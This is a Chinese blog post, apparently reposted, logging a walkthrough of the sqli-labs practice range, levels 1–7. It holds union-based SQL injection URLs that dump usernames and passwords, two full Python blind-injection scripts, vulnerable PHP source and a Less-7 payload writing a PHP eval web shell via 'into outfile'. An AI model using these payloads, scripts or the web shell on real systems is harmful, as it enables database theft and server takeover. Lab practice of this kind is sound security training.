【靶场练习_sqli-labs】练习记录

最新推荐文章于 2023-08-04 20:16:34 发布
最新推荐文章于 2023-08-04 20:16:34 发布
阅读量585 收藏
点赞数
文章标签: 数据库 php xhtml
原文链接:http://www.cnblogs.com/chrysanthemum/p/11518038.html
版权

Less-1:

 1.用order by得出待查表里有三个字段
  http://192.168.40.165/sqli-labs-master/Less-1/?id=1' order by 3--+
2.用union select得到数据库名——security
  http://192.168.40.165/sqli-labs-master/Less-1/?id=-1' union select 1,database(),2--+
3.用select group_concat(table_name) from information_schema.columns where table_schema=database()得到数据表名——emails,referers,referers,uagents,users
  http://192.168.40.165/sqli-labs-master/Less-1/?id=-1' union select 1,database(),(select group_concat(table_name) from information_schema.columns where table_schema=database())--+
4.用select group_concat(column_name) from information_schema.columns where table_name='emails'得到数据表中的字段名——id,email_id
  http://192.168.40.165/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='emails'),database()--+
5.用select group_concat(id,email_id) from emails 得到字段的值——name:1Dumb@dhakkan.com,2Angel@iloveu.com,3Dummy@dhakkan.local,4secure@dhakkan.local,5stupid@dhakkan.local,6superman@dhakkan.local,7batman@dhakkan.local,8admin@dhakkan.com
  http://192.168.40.165/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(id,email_id) from emails),database()--+

less-2

在2里面"and"居然失效了,好迷啊,索性"order by"还可以用

     

  • 有三列数据:
    • http://192.168.40.165/sqli-labs-master/Less-2/?id=1 order by 3--+
  • 当前数据库:security
    • http://192.168.40.165/sqli-labs-master/Less-2/?id=-1 union select 1,database(),3--+
  • security里面的数据表:_emails,_emails,_referers,_referers,_referers,_uagents,_uagents,_uagents,_uagents,_users,_users,_users
    • http://192.168.40.165/sqli-labs-master/Less-2/?id=-1 union select 1,database(),(select group_concat('_',table_name) from information_schema.columns where table_schema=database())--+
  • users表里的字段:user_id,first_name,last_name,user,password,avatar,id,username,password
    • http://192.168.40.165/sqli-labs-master/Less-2/?id=-1 union select 1,database(),(select group_concat(column_name) from information_schema.columns where table_name='users')--+
  • 得到字段值:DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidstupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4
    • http://192.168.40.165/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(username,password) from users),(select group_concat(column_name) from information_schema.columns where table_name='users')--+

    

 

less-3:单引号+括号闭合

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-3 Error Based- String (with Twist) </title>

</head>

<body bgcolor="#000000">

<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity


$sql="SELECT * FROM users WHERE id=('') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

        if($row)
        {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
        }
        else
        {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
        }
}
        else { echo "Please input the ID as parameter with numeric value";}

?>


</font> </div></br></br></br><center>
<img src="../images/Less-3.jpg" /></center>
</body>
</html>
源码

数据库:security
http://192.168.40.165/sqli-labs-master/Less-3/
?id=--1') union select 1,2,database() %23
数据表:emails,referers,uagents,users
http://192.168.40.165/sqli-labs-master/Less-3/
?id=--1') union select 1,2,group_concat(table_name) from information_schema.columns where table_schema=database() %23
列名:user_id,first_name,last_name,user,password,avatar,id,username,password
http://192.168.40.165/sqli-labs-master/Less-3/
?id=--1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23
字段值:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
http://192.168.40.165/sqli-labs-master/Less-3/
?id=--1') union select 1,2,group_concat(username) from users %23

 

less-4:双引号+括号闭合

双引号闭合:两条语句回显不同
?id=1" and "0
?id=1" and "1
括号闭合: use near 'union select 1,2,3 #") LIMIT 0,1' at line 1
http://192.168.40.165/sqli-labs-master/Less-4/
?id=1" union select 1,2,3 %23
http://192.168.40.165/sqli-labs-master/Less-4/
?id=1") union select 1,2,3 %23
数据库:security
http://192.168.40.165/sqli-labs-master/Less-4/
?id=-1") union select 1,database(),2 %23
数据表:emails,referers,uagents,users
http://192.168.40.165/sqli-labs-master/Less-4/
?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23
列名:user_id,first_name,last_name,user,password,avatar,id,username,password
http://192.168.40.165/sqli-labs-master/Less-4/
?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23
字段值:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
http://192.168.40.165/sqli-labs-master/Less-4/
?id=-1") union select 1,group_concat(username),3 from users%23

less-5:盲注单引号闭合,看到有的师傅说报错也可以做,有时间试试

这里补一个函数,一开始使用substr来切割,发现怎么写也不行,然后用的是left()

LEFT(str,len)

返回最左边的n个字符的字符串str,或NULL如果任何参数是NULL。

 
  
SQL> SELECT LEFT('foobarbar', 5); +---------------------------------------------------------+ | LEFT('foobarbar', 5) | +---------------------------------------------------------+ | fooba | +---------------------------------------------------------+ 1 row in set (0.00 sec)
//原文出自【易百教程】,商业转载请联系作者获得授权,非商业转载请保留原文链接:https://www.yiibai.com/sql/sql-left-function.html 
'''
@Modify Time      @Author   
------------      -------    
2019/9/29 13:26   laoalo    
'''
import requests
from lxml import etree
import time

tag = "You are in..........."
d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM,"
def database_length():
    '''
    数据库长度爆破
    :return: 数据库长度
    '''
    global tag
    url = "http://192.168.40.165/sqli-labs-master/Less-5/?id=1' and length(database())="
    i = 0
    while True:
        urls = url + str(i) + '%23'
        response = requests.get(urls).text
        htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
        print(urls)
        if htmlelmet:
            elment=htmlelmet[0]
            if elment == tag:
                return i
        else:
            i += 1
def database_name(length):
    '''
    爆破数据库名
    :param length: 数据库长度
    :return: 数据库名
    '''
    global d
    database=""
    for j in range(length+1):
       for i in d:
            urls = "http://192.168.40.165/sqli-labs-master/Less-5/?id=1' and left(database(),"+str(j)+")='"+database+i+"'--+"
            response = requests.get(url=urls).text
            htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
            print(urls)
            if htmlelmet:
                elment = htmlelmet[0]
                if elment == tag:
                    database += i
                    break
    return  database
def table_name_no_ascii(length):
    '''
    不用ascii的方法求表名,就直接遍历字典,等有空的时候完善
    :param length:
    :return:
    '''
    global d
    table=""
    for j in range(length+1):
        for i in d:
            urls="http://192.168.40.165/sqli-labs-master/Less-5/?id=1'and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)"+i+"--+"
            response = requests.get(url=urls).text
            htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
            print(urls)
            if htmlelmet:
                elment = htmlelmet[0]
                if elment == tag:
                   table += i
                   break
    return table
def table_length():
    '''
    计算当前数据库中所有的表的长
    :return: 表长
    '''
    global tag
    i = 0
    while True:
        urls = "http://192.168.40.165/sqli-labs-master/Less-5/?id=1' and length((select group_concat(table_name) from information_schema.columns where table_schema=database()))=" + str(i) + "--+"
        response = requests.get(urls).text
        htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
        print(urls)
        if htmlelmet:
            elment = htmlelmet[0]
            if elment == tag:
                return i
        else:
            i += 1
def table_name(length):
    '''
    ascii法爆破数据表
    :return: 表长
    '''
    global tag

    table=""
    for j in range(length+1):
        '''
        i 的往上增,直到超了
        '''
        i = 0
        while i<=122:
            urls = "http://192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(j)+",1))<" + str(i) + "--+"
            response = requests.get(urls).text
            htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
            print(urls)
            if htmlelmet:
                elment = htmlelmet[0]
                if elment == tag:
                   break
            else:
               i+=10
        '''
        此时i自减1开始定位名字
        '''
        print("开始自减")
        while i>0:
            urls = "http://192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(j)+",1))=" +str(i) + "--+"
            response = requests.get(urls).text
            htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
            if htmlelmet:
                elment = htmlelmet[0]
                if elment == tag:
                    table +=chr(i)
                    print('表名=',table)
                    break
            else:
                i-=1

    return table
def colums_length(table_name):
    '''
    查询指定表的字段值
    :param table_name: 表名
    :return:
    '''
    global tag
    i = 0
    while i<1000:
        urls = "http://192.168.40.165/sqli-labs-master/Less-5/?id=1' and length((select group_concat(column_name) from information_schema.columns where table_name='"+table_name+"'))=" + str(i) + "--+"
        response = requests.get(urls).text
        htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
        print(urls)
        if htmlelmet:
            elment = htmlelmet[0]
            if elment == tag:
                return i
        else:
            i += 1
def column_name(length,table_name):
    '''
    ascii法爆破字段
    :return: 表长
    '''
    global tag

    table=""
    for j in range(length+1):
        '''
         10的往上增,直到超了
        '''
        i = 0
        while i<=122:
            urls = "http://192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='"+table_name+"'),"+str(j)+",1))<" + str(i) + "--+"
            response = requests.get(urls).text
            htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
            print(urls)
            if htmlelmet:
                elment = htmlelmet[0]
                if elment == tag:
                   break
            else:
               i+=10
        '''
        此时i自减1开始定位名字
        '''
        print("开始自减")
        while i>0:
            urls = "http://192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='"+table_name+"'),"+str(j)+",1))=" +str(i) + "--+"
            response = requests.get(urls).text
            htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
            if htmlelmet:
                elment = htmlelmet[0]
                if elment == tag:
                    table +=chr(i)
                    print('表名=',table)
                    break
            else:
                i-=1

    return table
def data_length(colums,table):
    '''
    得到数据的长度
    :param colums: 字段名
    :param table: 表名
    :return: 数据的长度
    '''
    global tag
    i = 0
    while i < 1000:
        urls = "http://192.168.40.165/sqli-labs-master/Less-5/?id=1' and length((select group_concat("+colums+") from "+table+"))="+str(i) + "--+"
        response = requests.get(urls).text
        htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
        print(urls)
        if htmlelmet:
            elment = htmlelmet[0]
            if elment == tag:
                return i
        else:
            i += 1
def data_datail(length,colums,table):
    '''
    得到数据表中的值
    :param length: 值得长度
    :param colums: 查询的字段名
    :param table: 查询的表名
    :return: 字段值
    '''
    global d
    data = ""
    for j in range(1,length+1):
        for i in d:
            urls = "http://192.168.40.165/sqli-labs-master/Less-5/?id=1' and left((select group_concat("+colums+") from "+table+"), "+str(j)+" )='"+data+i+"'--+"
            print(urls)
            response = requests.get(urls).text
            htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
            if htmlelmet:
                elment = htmlelmet[0]
                if elment == tag:
                    data += i
                    print(colums,'字段值=',data)
                    break
        print(data)

if __name__ == '__main__':
    # print(table_length())
    # print(table_ascii(90))
    # print(colums_length('emails'))
    # print(column_name(11,'emails'))
    # print(data_length('id','emails'))
    print(data_datail(15,'id','emails'))
盲注脚本

 Less-6:盲注双引号闭合

       

 

'''
@Modify Time      @Author   
------------      -------    
2019/9/29 13:26   laoalo    
'''
import requests
from lxml import etree
import time

tag = "You are in..........."
d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM,"
def database_length():
    '''
    数据库长度爆破
    :return: 数据库长度
    '''
    global tag
    url = 'http://192.168.40.165/sqli-labs-master/Less-6/?id=1" and length(database())='
    i = 0
    while True:
        urls = url + str(i) + '%23'
        response = requests.get(urls).text
        htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
        print(urls)
        if htmlelmet:
            elment=htmlelmet[0]
            if elment == tag:
                return i
        else:
            i += 1
def database_name(length):
    '''
    爆破数据库名
    :param length: 数据库长度
    :return: 数据库名
    '''
    global d
    database=""
    for j in range(length+1):
       for i in d:
            urls = 'http://192.168.40.165/sqli-labs-master/Less-6/?id=1" and left(database(),'+str(j)+')="'+database+i+'"--+'
            response = requests.get(url=urls).text
            htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
            print(urls)
            if htmlelmet:
                elment = htmlelmet[0]
                if elment == tag:
                    database += i
                    break
    return  database
def table_name_no_ascii(length):
    '''
    不用ascii的方法求表名,就直接遍历字典,等有空的时候完善
    :param length:
    :return:
    '''
    global d
    table=""
    for j in range(length+1):
        for i in d:
            urls='http://192.168.40.165/sqli-labs-master/Less-6/?id=1" and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)'+i+'--+'
            response = requests.get(url=urls).text
            htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
            print(urls)
            if htmlelmet:
                elment = htmlelmet[0]
                if elment == tag:
                   table += i
                   break
    return table
def table_length():
    '''
    计算当前数据库中所有的表的长
    :return: 表长
    '''
    global tag
    i = 0
    while True:
        urls = 'http://192.168.40.165/sqli-labs-master/Less-6/?id=1" and length((select group_concat(table_name) from information_schema.columns where table_schema=database()))=' + str(i) + '--+'
        response = requests.get(urls).text
        htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
        print(urls)
        if htmlelmet:
            elment = htmlelmet[0]
            if elment == tag:
                return i
        else:
            i += 1
def table_name(length):
    '''
    ascii法爆破数据表
    :return: 表长
    '''
    global tag
    table = ""
    for j in range(length+1):
        '''
        i 的往上增,直到超了
        '''
        i = 0
        while i <= 122:
            urls = 'http://192.168.40.165/sqli-labs-master/Less-6/?id=1" and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),'+str(j)+',1))<' + str(i) + '--+'
            response = requests.get(urls).text
            htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
            if htmlelmet:
                elment = htmlelmet[0]
                if elment == tag:
                   break
            else:
                 i+=10
        '''
        此时i自减1开始定位名字
        '''

        print("开始自减",end="")
        while i>0:
            urls = 'http://192.168.40.165/sqli-labs-master/Less-6/?id=1" and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),'+str(j)+',1))=' +str(i) + '--+'
            response = requests.get(urls).text
            htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
            if htmlelmet:
                elment = htmlelmet[0]
                if elment == tag:
                    table +=chr(i)
                    print('表名=',table)
                    break
            else:
                i-=1

    return table
def colums_length(table_name):
    '''
    查询指定表的字段值
    :param table_name: 表名
    :return:
    '''
    global tag
    i = 0
    while i<1000:
        urls = 'http://192.168.40.165/sqli-labs-master/Less-6/?id=1" and length((select group_concat(column_name) from information_schema.columns where table_name="'+table_name+'"))=' + str(i) + '--+'
        response = requests.get(urls).text
        htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
        print(urls)
        if htmlelmet:
            elment = htmlelmet[0]
            if elment == tag:
                return i
        else:
            i += 1
def column_name(length,table_name):
    '''
    ascii法爆破字段
    :return: 表长
    '''
    global tag

    table=""
    for j in range(length+1):
        '''
         10的往上增,直到超了
        '''
        i = 0
        while i<=122:
            urls = 'http://192.168.40.165/sqli-labs-master/Less-6/?id=1" and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="'+table_name+'"),'+str(j)+',1))<' + str(i) + '--+'
            response = requests.get(urls).text
            htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
            print(urls)
            if htmlelmet:
                elment = htmlelmet[0]
                if elment == tag:
                   break
            else:
               i+=10
        '''
        此时i自减1开始定位名字
        '''
        print("开始自减")
        while i>0:
            urls = 'http://192.168.40.165/sqli-labs-master/Less-6/?id=1" and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="'+table_name+'"),'+str(j)+',1))=' +str(i) + '--+'
            response = requests.get(urls).text
            htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
            if htmlelmet:
                elment = htmlelmet[0]
                if elment == tag:
                    table +=chr(i)
                    print('表名=',table)
                    break
            else:
                i-=1

    return table
def data_length(colums,table):
    '''
    得到数据的长度
    :param colums: 字段名
    :param table: 表名
    :return: 数据的长度
    '''
    global tag
    i = 0
    while i < 1000:
        urls = 'http://192.168.40.165/sqli-labs-master/Less-6/?id=1" and length((select group_concat('+colums+') from '+table+'))='+str(i) + '--+'
        response = requests.get(urls).text
        htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
        print(urls)
        if htmlelmet:
            elment = htmlelmet[0]
            if elment == tag:
                return i
        else:
            i += 1
def data_datail(length,colums,table):
    '''
    得到数据表中的值
    :param length: 值得长度
    :param colums: 查询的字段名
    :param table: 查询的表名
    :return: 字段值
    '''
    global d
    data = ""
    for j in range(1,length+1):
        for i in d:
            urls = 'http://192.168.40.165/sqli-labs-master/Less-6/?id=1" and left((select group_concat('+colums+') from '+table+'), '+str(j)+' )="'+data+i+'"--+'
            print(urls)
            response = requests.get(urls).text
            htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
            if htmlelmet:
                elment = htmlelmet[0]
                if elment == tag:
                    data += i
                    print(colums,'字段值=',data)
                    break
        print(data)

if __name__ == '__main__':
    # print(database_length()) #8
    # print(database_name(8)) #security
    # print(table_length()) #90
    # print(table_name(90)) #emails,referers,uagents,users
    # print(colums_length('emails')) #11
    # print(column_name(11,'emails')) #id,email_id
    # print(data_length('id','emails')) #15
    print(data_datail(15,'id','emails')) #id 字段值= 1,2,3,4,5,6,7,8
盲注脚本

Less-7:文件上传

?id=0 union select 1,@@datadir,@@basedir MYSQL--+

?id=1')) union select 1,2,'<?php @eval($_POST[`cmd`])?>' into outfile './backdoor2.php7' --+

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-7 Dump into Outfile</title>

</head>

<body bgcolor="#000000">

<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">


<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity

<!-- $sql="SELECT * FROM users WHERE id=(('1')) union select  1,2,'<?php @eval($_POST[`cmd`])?>'  into outfile './test1.txt' --+')) LIMIT 0,1"; -->
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

        if($row)
        {
        echo '<font color= "#FFFF00">';
        echo 'You are in.... Use outfile......';
        echo "<br>";
        echo "</font>";
        }
        else
        {
        echo '<font color= "#FFFF00">';
        echo 'You have an error in your SQL syntax';
        //print_r(mysql_error());
        echo "</font>";
        }
}
        else { echo "Please input the ID as parameter with numeric value";}

?>
</font> </div></br></br></br><center>
<img src="../images/Less-7.jpg" /></center>
</body>
</html>
源码

Your Login name:/var/lib/mysql/

Your Password:/usr/

 

1、basedir 参数

解释:该参数指定了安装 MySQL 的安装路径,填写全路径可以解决相对路径所造成的问题。

例如:basedir="E:/dev/MySQL/MySQL Server 5.2/"表示我的 MySQL 安装在 E:/dev/MySQL/MySQL Server 5.2/ 路径下。

2、datadir 参数

解释:该参数指定了 MySQL 的数据库文件放在什么路径下。数据库文件即我们常说的 MySQL data 文件。

例如:datadir="E:/dev/MySQL/MySQL Server 5.2/Data/"则表示我的 MySQL 数据库文件放在 E:/dev/MySQL/MySQL Server 5.2/Data/ 路径下。

 

转载于:https://www.cnblogs.com/chrysanthemum/p/11518038.html

diemaoye6838
关注
sqli-labs靶场1-22关)
weixin_51566481的博客
08-16 8050
sqli-labs,sql注入,burpsuit
打靶sqli-labs靶场3-4
weixin_48852738的博客
06-11 1059
sqli-labs靶场3-4
打靶日志——Sqli靶场(Less1-10)
Aquarius_ego的博客
04-08 3167
sqli-labs靶场的Less1-Less10
sqli-Labs靶场笔记
young‘s blog
11-14 3206
点击打开链接http://blog.youkuaiyun.com/u012763794/article/details/51207833http://blog.youkuaiyun.com/u012763794/article/details/51361152http://blog.youkuaiyun.com/u012763794/artic...
Sqli-labs 靶场通关学习记录
eyyer的博客
02-13 1629
Sqli-labs 靶场通关学习记录
sqli-labs练习(第一关)——字符型
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-17 1604
目录1、判断是数字型还是字符型2、通过报错判断闭合符3、确认查询的字段数量4、确认占位信息5、找库名6、查表名7、找表字段8、找用户名和密码 首先,进入靶场 1、判断是数字型还是字符型 在url后面分别添加?id=1, ?id=2, ?id=2-1 ,观察页面的变化,判断是字符型还是数字型。 (如果id=2-1 与 id=1的页面一样,就是数字型;如果id=2-1与id=2的页面一样,就是字符型) http://172.16.11.222/sqli-labs/Less-1/?id=1 发现它是字符型。
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
最新发布
10-13
搭建sqli-labs靶场的过程相对简单。首先,用户需要准备一个包含Apache、MySQL和PHP的环境,例如使用wampserver或phpstudy等工具进行快速搭建。然后,将下载的sqli-labs-php7.zip解压到网站的根目录下,例如...
sqli-labs-master靶场
09-21
sqli-labs-master靶场是一个针对安全研究人员、开发者和网络安全爱好者的实践平台,特别设计用于学习和测试SQL注入攻击技术。SQL注入是一种常见的网络攻击手段,攻击者通过在应用程序的输入字段中注入恶意的SQL代码...
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
通过下载并安装phpStudy,用户可以轻松创建一个本地的PHP运行环境,这对于进行Sqli-labs-maste靶场练习来说是一个非常便捷的解决方案。在这样的环境下,用户不仅可以在安全的测试环境中对SQL注入进行测试,还能够...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
sqli-labs-master.zip
03-17
靶场的搭建过程相对简单,只需将下载的“sqli-labs-master.zip”文件解压,按照官方文档或者网络上的教程进行配置,就可以在个人虚拟环境中运行。这一步对于理解Web应用的运行环境和服务器配置也是很有帮助的。 在...
sqli靶场学习记录-第七、八关
qq_50744304的博客
08-04 283
第七关和第八关需要使用盲注,因为整个页面找不到回显点也没有报错信息,出现错误只会显示error,所以报错注入和联合注入都不适用。
union注入的几道ctf题,实验吧简单的sql注入1,2,这个看起来有点简单和bugku的成绩单...
weixin_30568591的博客
05-07 628
这几天在做CTF当中遇到了几次sql注入都是union,写篇博客记录学习一下。 首先推荐一篇文章“https://blog.youkuaiyun.com/Litbai_zhang/article/details/83869918” 再附上一张文章里面的图 接下来直接上题 1.这个看起来有点简单 题目连接:http://ctf5.shiyanbar.com/8/inde...
渗透测试中dns log的使用
zhangge3663的博客
05-08 1117
一、预备知识 dns(域名解析): 域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一种服务。IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来代替IP地址标识站点地址。域名解析就是域名到IP地址的转换过程。域名的解析工作由DNS服务器完成。 域名解析也叫域名指向、服务器设置、域名配置以及反向IP登记等等。说的简单点就是将好记的域名解析成IP,服务由DNS服务器完成,是把域名解析到一个IP地址,然后在此IP地址的主机上将一个子目录与域名绑定。 互联网中的地址是数
sql-lab 通关Less1 -65(深入学习)
热门推荐
ST0new的博客
10-02 2万+
文章目录sql-lab 复现通关(深入学习)前言目的less-1 基于错误的单引号字符串Less-2 基于错误的get整型注入Less-3 基于错误的get单引号变形字符型注入Less-4 基于错误的GET双引号字符型注入Less-5 双注入GET单引号字符型注入Less-6 双注入GET双引号字符型注入Less-7 导出文件GET字符型注入Less-8 布尔型单引号GET盲注Less-9 ...
2.1 union联合查询注入
n0d_xy的博客
04-14 1425
简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 前面的话:操作学习的环境----Linux环境...
sqli-labs靶场实现(一)【GET基于报错的SQL注入】(less-1~4、具体步骤+图文详解)
weixin_46709219的博客
12-12 1032
一)GET基于报错的SQL注入 1)SQL注入的分类 2)get基于报错的SQL注入发现 3)get基于报错的SQL注入利用 4)利用sqlmap测试 二) 三) —————————————————————————————————————————————————— 一)GET基于报错的SQL注入 1)SQL注入的分类 2)get基于报错的SQL注入发现 3)get基于报错的SQL注入利用 4)利用sqlmap测试 ...
SQLI DUMB SERIES-1-2
qq_43613144的博客
07-20 2613
安装了SQLI DUMB的题库 这些都是为了了解sql注入的方式,碰到的题目就是这样的题去找flag。现在就是去探索方法 第一题 1.提示输入ID,提示也有get,所以试试?id=1 再试试后面加’ 然后发现 ’ 没有被过滤,然后可以进行 回显成功 回显失败、 所以说此处存在注入点 2.用order by判断列数 第三栏位存在,第四栏位不存在,所以说这个表只有三列 3.爆库 联合查询注...
支持PHP7的sqli-labs靶场介绍
3. sqli-labs靶场sqli-labs是一个非常流行的在线学习平台,它提供了一个模拟的环境,其中包含了多个练习关卡,每个关卡都有一个或多个SQL注入漏洞等待用户发现和利用。通过逐个解决这些关卡,学习者可以掌握SQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值